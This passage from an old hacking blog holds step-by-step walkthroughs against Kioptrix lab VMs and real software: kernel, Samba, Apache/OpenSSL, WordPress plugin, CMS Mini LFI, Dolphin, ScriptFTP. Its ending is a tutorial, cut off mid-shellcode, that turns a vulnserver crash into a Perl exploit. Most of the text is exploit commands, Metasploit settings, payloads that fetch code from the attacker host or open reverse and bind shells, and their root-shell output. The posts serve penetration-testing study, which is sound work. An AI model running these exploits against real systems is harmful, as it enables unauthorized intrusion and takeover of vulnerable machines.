Great, now that we have access to the box, we need to get root.<br />
uname -a<br />
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 i686 <br />
i386 GNU/Linux<br />
<br />
Now we need to find an exploit for that kernel . If you google it, you will end up on securityfocus or other similar. You can download the exploit from securityfocus or from exploit-db or use the one that is inside backtrack.<br />
<a href="http://www.exploit-db.com/exploits/9542/">http://www.exploit-db.com/exploits/9542/</a><br />
<a href="http://www.securityfocus.com/bid/36108/info">http://www.securityfocus.com/bid/36108/info</a><br />
<br />
Or ... you can search inside backtrack.<br />
/pentest/exploits/exploitdb/searchsploit kernel linux local<br />
And that's the one you are looking for <br />
Linux Kernel 2.x sock_sendpage() Local Ring0 Root Exploit /linux/local/9435.txt<br />
Again, you can try other exploits as well. Now that you have the exploit, compile it and run it on the target machine.<br />
wget <a href="http://172.16.1.79/exploits/ip_append_data.c">http://172.16.1.79/exploits/ip_append_data.c</a><br />
gcc -o get_root ip_append_data.c<br />
./get_root<br />
sh: no job control in this shell<br />
sh-3.00# id<br />
uid=0(root) gid=0(root) groups=48(apache)<br />
<br />
And that's it, game over.Angelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.com4tag:blogger.com,1999:blog-3012395024337025063.post-75960357452353565542012-08-12T14:38:00.001-07:002012-08-12T14:38:20.193-07:00Kioptrix Hacking challenge LEVEL 1 part 3 (SSH)<iframe width="420" height="315" src="http://www.youtube.com/embed/L8kjoBfhkAo" frameborder="0" allowfullscreen></iframe>
<br>
Hi folks, ok, another option that we have to break into kioptix level 1, is bruteforce ssh, its quite simple, but takes a LOT of time if you are unlucky. Here is how you can crack down via bruteforce.<br />
In your backtrack type:<br />
cd /pentest/passwords/wordlists/<br />
hydra -l root -P rockyou.txt -t 3 -o login.pwd 172.16.1.144 ssh<br />
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only<br />
Hydra (<a href="http://www.thc.org/thc-hydra">http://www.thc.org/thc-hydra</a>) starting at 2012-08-08 13:33:19<br />
[DATA] 3 tasks, 1 server, 14344398 login tries (l:1/p:14344398), ~4781466 tries per task<br />
[DATA] attacking service ssh on port 22<br />
[22][ssh] host: 172.16.1.144 login: root password: 123456<br />
[STATUS] attack finished for 172.16.1.144 (waiting for children to finish)<br />
1 of 1 target successfuly completed, 1 valid password found<br />
Hydra (<a href="http://www.thc.org/thc-hydra">http://www.thc.org/thc-hydra</a>) finished at 2012-08-08 13:33:36<br />
<br />
<br />
As you can see, it found the pasword 123456 for the user root.<br />
<br />
PS : I changed the root password to 123456 for this demonstration only.<br />
<br />
<br />Angelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.com1tag:blogger.com,1999:blog-3012395024337025063.post-5730135814900176282012-08-12T14:37:00.001-07:002012-08-12T14:37:02.575-07:00Kioptrix Hacking challenge LEVEL 1 part 2 (SAMBA)<iframe width="420" height="315" src="http://www.youtube.com/embed/tPeRiGBQu_w" frameborder="0" allowfullscreen></iframe>
<br>
Kioptrix Hacking challenge LEVEL 1 part 2 (SAMBA)<br />
Hi everyone, this is the second part of the level 1, now we are going to exploit samba. As you remember from the last video, we managed to get root using an SSL exploit for apache, now its time to exploit a samba vulnerabilities. So, lets start.<br />
First, lets run an nmap<br />
nmap -sV 172.16.1.144<br />
Starting Nmap 6.01 ( <a href="http://nmap.org/">http://nmap.org</a> ) at 2012-08-07 11:12 BST<br />
Nmap scan report for 172.16.1.144<br />
Host is up (0.00068s latency).<br />
PORT STATE SERVICE VERSION<br />
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)<br />
MAC Address: 00:50:56:AF:5A:B9 (VMware)<br />
Ok, this output doesn't tell the version of samba, but we can try two commands <br />
to list the version :<br />
1) smbclient -L 172.16.1.144<br />
Result :<br />
Enter root's password:<br />
Anonymous login successful<br />
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]<br />
Sharename Type Comment<br />
--------- ---- -------<br />
cli_rpc_pipe_open_noauth: rpc_pipe_bind for pipe \srvsvc failed with error <br />
ERRnosupport<br />
IPC$ IPC IPC Service (Samba Server)<br />
ADMIN$ Disk IPC Service (Samba Server)<br />
Anonymous login successful<br />
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]<br />
<br />
2) smbclient //172.16.1.144/IPC$<br />
Result:<br />
Enter root's password:<br />
Anonymous login successful<br />
Domain=[MYGROUP] OS=[Unix] Server=[Samba 2.2.1a]<br />
tree connect failed: ERRnosuchshare<br />
Ok, now we know its running version 2.2.1a, lets try to find an exploit for <br />
it. If you google for "samba 2.2.1a" exploit<br />
You will find this exploit<br />
<a href="http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c">http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c</a><br />
So.. lets go back to our backtrack , download and compile it.<br />
wget <a href="http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c">http://downloads.securityfocus.com/vulnerabilities/exploits/0x333hate.c</a><br />
gcc -o exploit 0x333hate.c<br />
./exploit -t 172.16.1.144<br />
Result :<br />
[~] 0x333hate => samba 2.2.x remote root exploit [~]<br />
[~] coded by c0wboy ~ <a href="http://www.0x333.org/">www.0x333.org</a> [~]<br />
[-] connecting to 172.16.1.144:139<br />
[-] stating bruteforce<br />
[-] testing 0xbfffffff<br />
[-] testing 0xbffffdff<br />
[-] testing 0xbffffbff<br />
[-] testing 0xbffff9ff<br />
[-] testing 0xbffff7ff<br />
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown<br />
uid=0(root) gid=0(root) groups=99(nobody)<br />
<br />
<br />
There is another way to exploit this samba using metasploit. Lets try that.<br />
msfconsole<br />
search samba<br />
use linux/samba/trans2open<br />
show options<br />
set RHOST 172.16.1.144<br />
show payloads<br />
set PAYLOAD linux/x86/shell/bind_tcp<br />
show options<br />
exploit<br />
[*] Started bind handler<br />
[*] Trying return address 0xbffffdfc...<br />
[*] Trying return address 0xbffffcfc...<br />
[*] Trying return address 0xbffffbfc...<br />
[*] Trying return address 0xbffffafc...<br />
[*] Sending stage (36 bytes) to 172.16.1.144<br />
[*] Trying return address 0xbffff9fc...<br />
[*] Command shell session 1 opened (172.16.1.79:52832 -> 172.16.1.144:4444) at <br />
2012-08-07 11:51:46 +0100<br />
id<br />
uid=0(root) gid=0(root) groups=99(nobody)<br />
<br />
<br />
Success!! We got again on the box.Angelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.com1tag:blogger.com,1999:blog-3012395024337025063.post-20049725978478218272012-08-12T14:34:00.001-07:002012-08-12T14:36:07.113-07:00Kioptrix Hacking challenge LEVEL 1 part 1 (APACHE)<iframe width="420" height="315" src="http://www.youtube.com/embed/C2mubyfc7ns" frameborder="0" allowfullscreen></iframe>
<br />
<br />
Kioptrix Hacking challenge LEVEL 1 part 1 (APACHE)<br />
Hi everyone, in this post I will be demonstrating how to hack Kioptrix Level 1 .But what is kioptrix? Its a linux distro with lots of vulnerabilities, so we can play and test our knowledgement. To download, go to : <a href="http://www.kioptrix.com/blog/?page_id=135">http://www.kioptrix.com/blog/?page_id=135</a> , and use vmware player to open the files and you are ready to go.So, now that's everything up and running, we need to discover the IP address of the target machine because it gets via DHCP from your network ( by the way, you need a DHCP server in order for this to work). To find out what's the IP address , lets run an nmap on our network that will look for live hosts.<br />
<br />
# nmap -sn 172.16.1.0/24<br />
Nmap scan report for 172.16.1.144<br />
Host is up (0.0010s latency).<br />
MAC Address: 00:50:56:AF:5A:B9 (VMware)<br />
<br />
Great, now that we found it the IP address, lets see what's running in the host.<br />
<br />
#nmap -sV 172.16.1.144<br />
<br />
<br />
Starting Nmap 6.01 ( <a href="http://nmap.org/">http://nmap.org</a> ) at 2012-08-03 16:47 BST<br />
Nmap scan report for 172.16.1.144<br />
Host is up (0.033s latency).<br />
Not shown: 994 closed ports<br />
PORT STATE SERVICE VERSION<br />
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)<br />
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)<br />
111/tcp open rpcbind (rpcbind V2) 2 (rpc #100000)<br />
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)<br />
443/tcp open ssl/http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)<br />
1024/tcp open status (status V1) 1 (rpc #100024)<br />
MAC Address: 00:50:56:AF:5A:B9 (VMware)<br />
<br />
<br />
Ok, at this point there is a lot to do. We need to find if the running version of each open port has an exploit for the version.To get the proper version and vulnerability ID, lets use nikto to scan the host. I am not going to explain all vulnerabilities of the distro, I think two is good enough, you guys can try for your self's other ways to break into. So I am going to show how to break in using apache and samba.<br />
1) cd /pentest/web/nikto/<br />
2) ./nikto.pl -host 172.16.1.144<br />
3) The results (The intersting bits) :<br />
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b<br />
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.<br />
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.<br />
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.<br />
<br />
<br />
Right, now we need to google it for the CVEs or you can search for the exploit on backtrack itself.<br />
Run:<br />
/pentest/exploits/exploitdb/searchsploit apache linux remote<br />
Webfroot Shoutbox < 2.32 (Apache) Remote Exploit /linux/remote/34.pl<br />
Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl /linux/remote/38.pl<br />
Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit /linux/remote/126.c<br />
Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit /linux/remote/132.c<br />
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)/linux/remote/764.c<br />
Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield) /linux/remote/4162.c<br />
Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support) /linux/remote/4552.pl<br />
Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit /linux/remote/5386.txt<br />
<br />
<br />
As you can see, there is one for OpenSSL (764.c) OpenFuck.<br />
Now, because this is really old, you need to change the exploit a bit in order to make it work.<br />
1) Add: #include <openssl rc4.h> <br />
2) Add: #include <openssl md5.h> <br />
3) Search inside the exploit for "wget" and change the url for the correct one because that is not valid anymore. If you google it for ptrace-kmod.c , you will find that the correct address is : <br />
<a href="http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c">http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c</a><br />
So, just change that on the exploit, save it .<br />
Now we need to compile it, but before that, we need install the ssl-dev libraries. <br />
Run : <br />
apt-get install libssl-dev<br />
cd /pentest/exploits/exploitdb/platforms/linux/remote<br />
gcc -o OpenFuck 764.c -lcrypto<br />
Run the exploit now<br />
./OpenFuck <br />
Look for the target, we know that its running apache on a redhat, and that is running 1.3.20 so lets filter that:<br />
./OpenFuck | grep -i redhat | grep "1.3.20"<br />
That limits the results to only two<br />
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1<br />
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2<br />
So we can try first the target as 0x6a and if that doesn't work, we can try 0x6b.<br />
./OpenFuck 0x6a 172.16.1.144 443<br />
Result :<br />
Establishing SSL connection<br />
cipher: 0x4043808c ciphers: 0x80fc3f0<br />
Ready to send shellcode<br />
Spawning shell...<br />
Good Bye!<br />
<br />
As you can see, that did not worked.<br />
Lets try the other one now.<br />
./OpenFuck 0x6b 172.16.1.144 443<br />
Result:<br />
Establishing SSL connection<br />
cipher: 0x4043808c ciphers: 0x80f83c0<br />
Ready to send shellcode<br />
Spawning shell...<br />
bash: no job control in this shell<br />
bash-2.05$o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; ttp://172.16.1.79/ptrace-kmod.c; gcc -<br />
--09:18:29-- <a href="http://172.16.1.79/ptrace-kmod.c">http://172.16.1.79/ptrace-kmod.c</a> => `ptrace-kmod.c'<br />
Connecting to 172.16.1.79:80... connected!<br />
HTTP request sent, awaiting response... 200 OK<br />
Length: 3,921 [text/x-csrc] 0K ... 100% @ 3.74 MB/s<br />
09:18:29 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]<br />
[+] Attached to 17426<br />
[+] Waiting for signal<br />
[+] Signal caught<br />
[+] Shellcode placed at 0x4001189d<br />
[+] Now wait for suid shell...<br />
id<br />
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)<br />
<br />
<br />
Success !! We got root on the box.<br />
In the next video I will demonstrate how to hack using samba.Angelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.com6tag:blogger.com,1999:blog-3012395024337025063.post-91328640498358059732012-06-01T02:29:00.000-07:002012-06-01T02:29:52.392-07:00WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/0BTt1ERGcL4" width="420"></iframe><br />
<br />
<br />
WordPress 1 Flash Gallery Plugin Arbitrary File Upload Vulnerability<br />
Secunia Advisory SA45930 <br />
Release Date 2011-09-08<br />
The vulnerability is caused due to the wp-content/plugins/1-flash-gallery/upload.php script (when "action" is set to "uploadify" and "fileext" is set to e.g. "php") improperly verifying uploaded files. This can be exploited to execute arbitrary PHP code by uploading a PHP file. The vulnerability is confirmed in version 1.5.6. Prior versions may also be affected.<br />
<br />
Download the exploit from http://www.exploit-db.com/exploits/17801/<br />
Copy to /pentest/exploits/framework3/modules/exploits/multi/http<br />
<br />
Fix the payload /pentest/exploits/framework3/modules/payloads/singles/php/reverse_php.rb as I explained on my video.<br />
<br />
msfconsole<br />
use multi/http/flash_galery_wordpress<br />
set RHOST 172.16.1.70<br />
set URI /wordpress<br />
set PAYLOAD php/reverse_php_airwolf<br />
set LHOST 172.16.1.79<br />
exploit<br />
<br />
And that's it, thank you guys for watching it.Unknownnoreply@blogger.com9tag:blogger.com,1999:blog-3012395024337025063.post-16995434317902812552012-03-26T07:25:00.003-07:002012-06-01T02:07:11.414-07:00About posts in this blogHi Everyone, I am writing this post to help you guys help me .<br />
I have posted stuff from LFI,RFI,Sql injection, exploits, how to write exploits, how to use some tools, so, I am not sure what else can I post. Should I post more exploits of RFI, LFI, sql injection and etc ?<br />
The way to exploit is "always" the same, the only thing that changes is the software to be exploited. What do you guys think ? Should I repeat posts for the same thing(LFI,RFI,etc) on different products?Angelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.com5tag:blogger.com,1999:blog-3012395024337025063.post-75987333848556525422011-10-20T05:58:00.001-07:002012-06-01T02:07:42.318-07:00CMS Mini 0.2.2 Local File Inclusion Vulnerabilities<div>
<div>
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/tJMzXgnBUjM" width="420"></iframe><br />
<br />
CMS Mini 0.2.2 Multiple Local File Inclusion Vulnerabilities</div>
<div>
<br />
Hi everyone, this is a really quick post, this is just to show a LFI on CMS mini 0.2.2</div>
<br />
Just access this URL and put some ../../../../ and the file that you wanna look, don't forget to change the IP address to your server.<br />
<br />
<div>
<br />
<a href="http://172.16.1.70/cmsmini/admin/edit.php?name=../../../../../../../../../../../../etc/passwd">http://172.16.1.70/cmsmini/admin/edit.php?name=../../../../../../../../../../../../etc/passwd</a> </div>
<br />
<div>
I know, its a boring post ;)</div>
<br />
<br />
<div>
</div>
</div>Angelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.com3tag:blogger.com,1999:blog-3012395024337025063.post-18683441585111769592011-10-20T03:02:00.001-07:002012-06-01T02:28:28.585-07:00Dolphin 7.0.7 "eval()" PHP Code Execution Vulnerability<div align="justify">
<iframe allowfullscreen="" frameborder="0" height="315" src="http://www.youtube.com/embed/nOsnRgORfvM" width="420"></iframe><br />
<br />
Dolphin "eval()" PHP Code Execution Vulnerability<br />
<br />
Secunia Advisory SA46457<br />
Release Date 2011-10-19<br />
URL http://secunia.com/advisories/46457/<br />
Exploit URL : http://www.exploit-db.com/exploits/17994/<br />
Description: A vulnerability has been discovered in Dolphin, which can be exploited by malicious users to compromise a vulnerable system. Input passed via the "bubbles" parameter to member_menu_queries.php (when "action" is set to "get_bubbles_values") is not properly sanitised before being used in an "eval()" call. This can be exploited to execute arbitrary PHP code.</div>
<br />
<br />
<div align="justify">
The vulnerability is confirmed in version 7.0.7. Other versions may also be affected.<br /><br />----<br /><br />Hi everyone, so, this is just a quick post to show dolphin 7.0.7 exploit. This is how you test it :<br />1) Download the application from http://www.4shared.com/file/HTsuoYry/Dolphin-v707.html<br />2) Install it<br />3) Download the exploit<br />4) Run the exploit in the format : php dolphin707.php 172.16.1.70 /dolphin/ user pass<br />Remember to change the ip to match yours.<br />5) You got your shell<br /><br />This is what looks like<br />root@bt:~/exploits# php dolphin707.php 172.16.1.70 /dolphin/ admin hacktest<br /><br />+------------------------------------------------------------+<br />| Dolphin <= 7.0.7 Remote PHP Code Injection Exploit by EgiX |<br />+------------------------------------------------------------+<br /><br />dolphin-shell# id<br />uid=48(apache) gid=48(apache) groups=48(apache)<br /><br /><br /><br />Thanks for whatching. </div>Angelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.com1tag:blogger.com,1999:blog-3012395024337025063.post-43017449805063213912011-10-18T05:27:00.000-07:002012-06-01T02:28:41.571-07:0010k visitsI just want to say thank you all for visiting my blog, I just reached 10k visits and I am really pleased !!Angelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.com1tag:blogger.com,1999:blog-3012395024337025063.post-33748330804155218842011-10-13T01:43:00.000-07:002012-06-01T02:29:32.351-07:00TwitterH everyone, after 1 week battle with twitter, I finally got my account up and running. I got banned since day one because they thought that I was managing loads of accounts, yeah, right.. well, anyway, now you guys can follow me in twitter at <a href="http://twitter.com/#%21/pochackblog">#pochackblog</a><br />
<br />
Thank you all.Angelohttp://www.blogger.com/profile/05892942548123519223noreply@blogger.com1tag:blogger.com,1999:blog-3012395024337025063.post-66094098527784043532011-10-09T01:55:00.000-07:002012-06-01T02:31:26.200-07:00AmmSoft ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability<iframe allowfullscreen="" frameborder="0" height="349" src="http://www.youtube.com/embed/hjtB8rIeyfI?hl=en&fs=1" width="425"></iframe><br />
<br />
AmmSoft ScriptFTP 'GETLIST' or 'GETFILE' Commands Remote Buffer Overflow Vulnerability<br />
Class: Boundary Condition Error<br />
CVE: <br />
Remote: Yes<br />
Local: No<br />
Published: Sep 20 2011 12:00AM<br />
Updated: Sep 30 2011 07:00AM<br />
Credit: Tom Gregory<br />
Vulnerable: AmmSoft ScriptFTP 3.3<br />
URL : http://www.securityfocus.com/bid/49707<br />
Description : ScriptFTP is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. Attackers can exploit this issue to execute arbitrary code within the context of the application. Failed attacks may cause a denial-of-service condition. ScriptFTP 3.3 is vulnerable; other versions may also be affected. <br />
<br />
In order to exploit this you can either use the python or the metasploit exploit, I prefer using the the metasploit because of the payloads. So the first thing you need to do is put the exploit under the folder /pentest/exploits/framework3/modules/exploits/windows , I called mine scriptftp33.rb , just paste the content of <br />
http://www.securityfocus.com/data/vulnerabilities/exploits/49707.rb<br />
<br />
Now step by step<br />
1) msfconsole<br />
2) use windows/ftp/scriptftp33 ( To use the exploit that we just created)<br />
3) set PAYLOAD windows/meterpreter/bind_tcp (To use meterpreter as our payload)<br />
4) set RHOST 172.16.1.7 (This is the ip address of the server that I am attacking)<br />
5) exploit<br />
<br />
Ok, now the attacking server bit is ready to go, you need to download the ftp script from <br />
http://www.scriptftp.com/ScriptFTP_3_3_setup.exe and install it<br />
Open the scriptftp and create and script with the following content:<br />
<br />
OPENHOST("172.16.1.79","ftptest","passwordtest")<br />
SETPASSIVE(ENABLED)<br />
GETLIST($list,REMOTE_FILES)<br />
CLOSEHOST<br />
<br />
<br />
172.16.1.79 = The ip address of the attacking server.<br />
ftptest = username<br />
passwordtest = password<br />
Remember to create this user in your attacking server.<br />
Save it as exploit.ftp<br />
Now click open and select exploit.ftp<br />
If everything goes all right, in your metasploit you now should see something like this :<br />
msf exploit(scriptftp33) > [*] 172.16.1.7:1518 LOGIN ftptest / passwordtest<br />
[*] - Data connection set up<br />
[*] - Sending directory list via data connection<br />
[*] Sending stage (752128 bytes) to 172.16.1.7<br />
[*] Meterpreter session 1 opened (172.16.1.79:37594 -> 172.16.1.7:4444) at 2011-09-30 10:15:21 <br />
<br />
+0100<br />
<br />
Right, now you have your meterpreter session, just type " sessions -i 1" and you can do everything you want ;)<br />
<br />
That's it guys.Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-3012395024337025063.post-91704571997082648322011-10-09T01:54:00.000-07:002012-06-01T02:38:49.580-07:00From fuzzing to creating an exploit<iframe allowfullscreen="" frameborder="0" height="349" src="http://www.youtube.com/embed/d8KXoTFRwJ8?hl=en&fs=1" width="425"></iframe><br />
<br />
Hi everyone, this is a complex post, but I will do my best to explain the bits and pieces with some URL's that you guys can read a bit better to understand everything I am trying to explain, I did this thing a few weeks ago, and I think its interesting to post what I have done, so you guys can understand a bit better on how things are made and how hackers get to the point of creating an exploit, I will not go really deep on the explanations because then the post will become really boring and no one will watch it, so lets see if I get some of you that are curious about the subject to watch the video until the end.<br />
The first thing you will need is a vulnerable server, there is a project created by "lupin" that you can download and do your own tests, so please, download the vulnserver from this URL.<br />
<br />
http://grey-corner.blogspot.com/2010/12/introducing-vulnserver.html<br />
And download the OLLYDBG from:<br />
http://www.ollydbg.de/<br />
<br />
You will find the download link in the bottom of the webpage.<br />
Please, do not run this in a production server as MAY crash the server, it never happen to me.. but who knows ;)<br />
Before you read the post , I recommend that you read the following wikis.<br />
<br />
EIP = http://en.wikipedia.org/wiki/Instruction_pointer<br />
Buffer overflow = http://en.wikipedia.org/wiki/Buffer_overflow<br />
SEH = http://en.wikipedia.org/wiki/Structured_Exception_Handling#Structured_Exception_Handling<br />
FUZZ Testing = http://en.wikipedia.org/wiki/Fuzz_testing<br />
nops = http://forum.hitb.org/viewtopic.php?f=1&t=17925<br />
<br />
<br />
Ok, lets do this , bellow are the step by step of the thing you will need to do.<br />
<br />
1) Launch the server (vulnserver.exe) that will open port 9999<br />
2) Now open up a shell in your backtrack and telnet 172.16.1.7 9999 , then HELP<br />
3) This is the list of commands that may have or may not have problems<br />
STATS [stat_value]<br />
RTIME [rtime_value]<br />
LTIME [ltime_value]<br />
SRUN [srun_value]<br />
TRUN [trun_value]<br />
GMON [gmon_value]<br />
GDOG [gdog_value]<br />
KSTET [kstet_value]<br />
GTER [gter_value]<br />
HTER [hter_value]<br />
LTER [lter_value]<br />
KSTAN [lstan_value]<br />
STATS [stat_value]<br />
RTIME [rtime_value]<br />
LTIME [ltime_value]<br />
SRUN [srun_value]<br />
TRUN [trun_value]<br />
GMON [gmon_value]<br />
GDOG [gdog_value]<br />
KSTET [kstet_value]<br />
GTER [gter_value]<br />
HTER [hter_value]<br />
LTER [lter_value]<br />
KSTAN [lstan_value]<br />
<br />
<br />
4) Play a bit typing commands like "STATS COMMAND" , it will return "STATS VALUE NORMAL"<br />
or "TRUN COMMAND" , it will return TRUN COMPLETE.<br />
<br />
5) Now, in your backtrack, go to /pentest/fuzzers/spike/src and type ". ld.sh" , this will fix a bug in backtrack that prevents us to do the next step.<br />
<br />
7) There is a command called generic_send_tcp that we will use to send our junk to the server.<br />
You will need to create a script called stats.spk with the following content :<br />
s_readline(); //this will read the banner that the server is sending to us<br />
s_string("STATS ");<br />
s_string_variable("COMMAND");<br />
<br />
Now, you save it and run it.<br />
./generic_send_tcp 172.16.1.7 9999 ./stats.spk 0 0 <br />
172.16.1.7 = The server that is running the vunlserver.exe<br />
What we are doing here is testing the server for that specific command STATS, the command generic_send_tcp will send a lot of random junk to the server and it will try to crash it.<br />
<br />
As you can see, the application did not crash, that means that the command STATS does not contain any buffer overflow problem. Lets try with another command , TRUN <br />
<br />
Create the script trun.spk <br />
s_readline(); //this will read the banner that the server is sending to us<br />
s_string("TRUN ");<br />
s_string_variable("COMMAND");<br />
<br />
Save it and run.<br />
./generic_send_tcp 172.16.1.7 9999 ./trun.spk 0 0 <br />
As you can see, now the application crashed.<br />
Now you will have to find out:<br />
1) What caused it to crash<br />
2) How many bytes caused to crash, because we want to find the EIP value.<br />
<br />
In order to do that, we need to run wireshark on the background to capture the packages , so we can do some further analyses. <br />
With wireshark running, run the generic_send_tcp again against TRUN command .<br />
Ok, it crashed again, you can stop wireshark and put the filter tcp.port==9999 , so it will show only what it matters for us.<br />
Now you need to click on Follow tcp stream until you find a lot of AAAAAAA, those AAAAAAA were generated by the generic_send_tcp, you can see that this is the one that we are looking for because at the end of the AAAA there is no proper closed connection meaning that the server crashed.<br />
<br />
Now, save as crash.txt (Only what you sent to the server, that's 5009 bytes).<br />
You should ask yourself now how many bytes it took to make the application to crash?<br />
<br />
With the command "wc -m crash.txt" you will find that out.<br />
The output is 5009 bytes crash.txt , but if you remove "TRUN /.:/" from the beginning that is equal to 5000.<br />
<br />
Create a file called exploit1.pl with the follow content:<br />
#!/usr/bin/perl<br />
use IO::Socket;<br />
$header = "TRUN /.:/";<br />
$junk="\x41" x 5000; #That is 5000xA , we are sending 5000 bytes to the server.<br />
$socket = IO::Socket::INET->new(<br />
Proto => "tcp",<br />
PeerAddr => "$ARGV[0]",<br />
PeerPort => "$ARGV[1]",<br />
);<br />
$socket->recv($serverdata, 1024);<br />
print $serverdata;<br />
$socket->send($header.$junk);<br />
<br />
Save it and give execute permission chmod +x exploit1.pl<br />
Now execute ./exploit1.pl 172.16.1.7 9999<br />
As expected the application crashed again, now we need to create a pattern with 5000 bytes, in order to do that, type the command:<br />
<br />
/pentest/exploits/framework3/tools/pattern_create.rb 5000<br />
<br />
Now create an exploit2.pl with EXACT the same content, except the $junk, instead "\x41 X 5000" , you will insert the pattern that you just created.<br />
<br />
Save it , give execute permission . Before you execute this time, please open up your OLLYDBD and attach the vunlserver.exe (File-Attach)<br />
Click the Play button and now execute the exploit again.<br />
<br />
./exploit2.pl 172.16.1.7 9999<br />
<br />
<br />
You will see that the application crashed with the message : "Don't know how to continue because memory at address 386F4337 is not readable. Try to change the EIP or pass exception to program" <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYfmCKXw4MqeoSwipUEGI_wPH_lTy_zKb-3SYWxasO5DINVNb62954nTtUoLSCQhUCwQtdTPRKhUMK8clkyzDm0fcE0ve-JgAahpPwu7C9GjaRFKmuQxlMzWbQDahRAkFhdtF4aXtY80s/s1600/eip.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="220" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYfmCKXw4MqeoSwipUEGI_wPH_lTy_zKb-3SYWxasO5DINVNb62954nTtUoLSCQhUCwQtdTPRKhUMK8clkyzDm0fcE0ve-JgAahpPwu7C9GjaRFKmuQxlMzWbQDahRAkFhdtF4aXtY80s/s320/eip.JPG" width="320" /></a></div>
<br />
<br />
<br />
Ok, bingo!! That's what we want , that address 386F4337 is our EIP and if you are running on a window XP SP3 , you should get the same EIP!<br />
<br />
Now you need to look for that value in the memory, in order to do that, type in your backtrack<br />
<br />
/pentest/exploits/framework3/tools/pattern_offset.rb 0x386F4337 5000<br />
The output is 2003<br />
<br />
Now you need to overwrite the EIP with a jump esp instruction , that's the basic stack overflow technique. You can use the msfpescan against the .dll of the software, in this case essfunc.dll<br />
<br />
msfpescan -j esp essfunc.dll <br />
and you wil get something like this :<br />
[essfunc.dll]<br />
0x625011af jmp esp<br />
0x625011bb jmp esp<br />
0x625011c7 jmp esp<br />
0x625011d3 jmp esp<br />
0x625011df jmp esp<br />
0x625011eb jmp esp<br />
0x625011f7 jmp esp<br />
0x62501203 jmp esp<br />
0x62501205 jmp esp<br />
<br />
<br />
Get the first one ( 0x625011af) <br />
As we are working with an intel system, we need to put in reverse our $eip variable.<br />
$eip=pack('V',0x625011af); # v for reverse<br />
<br />
Now, you need to launch a program in the target(payload), like calc.exe or cmd or anything you like, to do that, there is a command that will encode this into a payload format.<br />
The possibilities are endless, here are some examples of what you can do <br />
To open calc.exe<br />
/pentest/exploits/framework3/msfpayload windows/exec CMD=calc EXITFUNC=seh R | /pentest/exploits/framework3/msfencode -t perl -e x86/alpha_upper<br />
<br />
To bind the command prompt to port 4444<br />
msfpayload windows/shell_bind_tcp lport=4444 exitfunc=process R | msfencode -t perl -e x86/alpha_upper<br />
<br />
In this next exploit I will put all above together and I will be using the shell_bind_tcp, so lets call it exploit3.pl<br />
<br />
#!/usr/bin/perl<br />
use IO::Socket;<br />
$header = "TRUN /.:/";<br />
$junk="\x41" x 2003;<br />
$eip=pack('V',0x625011af);<br />
$nop="\x90" x 20;<br />
$shellcode= "\x89\xe5\xda\xd1\xd9\x75\xf4\x59\x49\x49\x49\x49\x49\x43" .<br />
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58" .<br />
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .<br />
